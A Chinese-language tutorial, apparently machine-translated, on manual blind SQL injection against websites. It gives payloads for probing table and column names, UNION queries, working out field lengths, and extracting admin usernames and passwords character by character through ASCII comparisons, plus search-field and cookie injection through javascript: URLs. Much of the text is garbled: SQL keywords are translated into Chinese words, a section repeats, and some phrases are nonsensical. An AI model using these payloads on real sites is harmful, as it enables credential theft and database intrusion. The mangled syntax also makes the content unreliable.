教你如何手动注入猜测语句。
注释:猜测表名:存在(从表名中选择*)
猜一下名单的名字:
存在(从表名中选择字段)
结合的方法:
联合查询:
选择名称,密码,用户会选择用户ID,密码,UID
指定表名的名称:
1 = 1联盟选择12345从表名
一
猜测表名:
存在(从表名中选择*)
猜一下名单的名字:
存在(从表名中选择字段)
结合的方法:
联合查询:
选择名称,密码,用户会选择用户ID,密码,UID
指定表名的名称:
1 = 1联盟选择12345从表名
逐字解码:
1。猜测列的长度
猜测声明:
和(从表名中选择top 1(name)> n)
(从表名中选择top 1(name))n
其中n是一个数字,将这个n的值转换为猜测列的长度,例如:
和(从表名中选择顶部1位(名称)> 1)
和(从表名中选择顶部1位(名称)> 6)
如果您猜测了正常页面的6个,猜测7,返回一个错误(大于6和小于7),然后列长度为7。因为前1意味着提取前1条记录,如果您想猜测第二条记录,您应该使用它。
从表名中选择top 1(列名)
列名不在(从表名中选择top 1名称)
2,用于猜测用户和密码的ASCII码分析方法
ASC()函数和中间函数
例如:中间(列名,n,1)
ASC(名称,n,1)获得n位字符ASCII码的名称。
猜测语句如下所示:
和(从数据库名称中选择顶部1 ASC(中间(1,1,1))= ASC代码(交换工具更改))
区间判断表:
…之间…和…
中医治疗方法:
当转换ASCII时,负数(负数)取绝对值用的abs()函数。
示例:(选择顶部1 ABS(从数据库名称中的中间(字段,1,1))= ASC代码(通过转换工具)
ASCII逐字解码方法的应用:
1。猜测表的名称:
和(从admin中选择计数(*)> < 0)
2,猜测名单的名称:
(从表名中选择计数(name))< > 0
3,猜测管理员的用户数:
(从表名中选择计数(*)= 1)
恢复正常,表中有记录。
4,猜测管理员用户名的长度:
和(从表名中选择莱恩(name))> = 1,> = 2,> = 3,> = 4。
5,猜测管理员用户名:
和(从30到130之间的表名(ASC(中间(1,1)))选择计数(*)< > 0
最后提交:
值和(从表名中选择ASC(中间(1,1(1,1))= ASCII码)
6。猜管理员密码:
根据上述原则,管理员可以通过将上述语句中的中间(列名,1,1)更改为密码来获得管理员的密码。
使用猜测语句的搜索类型注入漏洞:
关键字和1 = 1和% =% %。
关键字和1 = 2和% =% %。
将1和1更改为注入语句是可以的。
cookie注入语句:
Javascript:警报(文件逃跑(44和1 = 1 );
Javascript:警报(文件逃跑(44和1 = 2 );
猜测声明:
猜解的长度:
Javascript:警报(文件,,,逃离()44和(从admin中选择(密码)=16 ))
猜测的内容:
javascript:警报(文件逃跑()44(并选择ASC(来自admin的中间(用户名))= 97))